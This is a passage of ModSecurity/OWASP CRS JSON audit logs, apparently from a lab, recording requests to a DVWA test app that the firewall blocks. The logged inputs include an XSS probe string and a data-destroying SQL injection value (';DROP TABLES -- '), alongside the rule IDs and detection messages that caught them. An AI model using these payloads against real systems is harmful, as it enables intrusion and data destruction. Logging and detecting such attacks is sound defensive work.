\"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":460,"p2":4250,"p3":0,"p4":0,"p5":211,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BsAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:37:11 GMT","If-None-Match":"W/\"246-54f6a6f09244d\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:38:35 GMT","ETag":"\"26d-54f6a7404e88e\"","Accept-Ranges":"bytes","Content-Length":"621","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2jX8AAQEAAAkZ0BsAAAAE\"]"],"stopwatch":{"p1":391,"p2":995,"p3":54,"p4":135,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BwAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0BwAAAAE\"]"],"stopwatch":{"p1":579,"p2":1227,"p3":66,"p4":335,"p5":66,"sr":32,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0B0AAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0B0AAAAE\"]"],"stopwatch":{"p1":867,"p2":1098,"p3":49,"p4":247,"p5":65,"sr":62,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:13 --0400","transaction_id":"WRc2sX8AAQEAAAkVV5AAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sX8AAQEAAAkVV5AAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":462,"p2":1963,"p3":114,"p4":375,"p5":78,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:14 --0400","transaction_id":"WRc2sn8AAQEAAAkVV5EAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sn8AAQEAAAkVV5EAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":427,"p2":1409,"p3":98,"p4":377,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:35 --0400","transaction_id":"WRc2x38AAQEAAAmHBJoAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":496,"p2":2723,"p3":0,"p4":0,"p5":143,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:40 --0400","transaction_id":"WRc2zH8AAQEAAAmHBJsAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 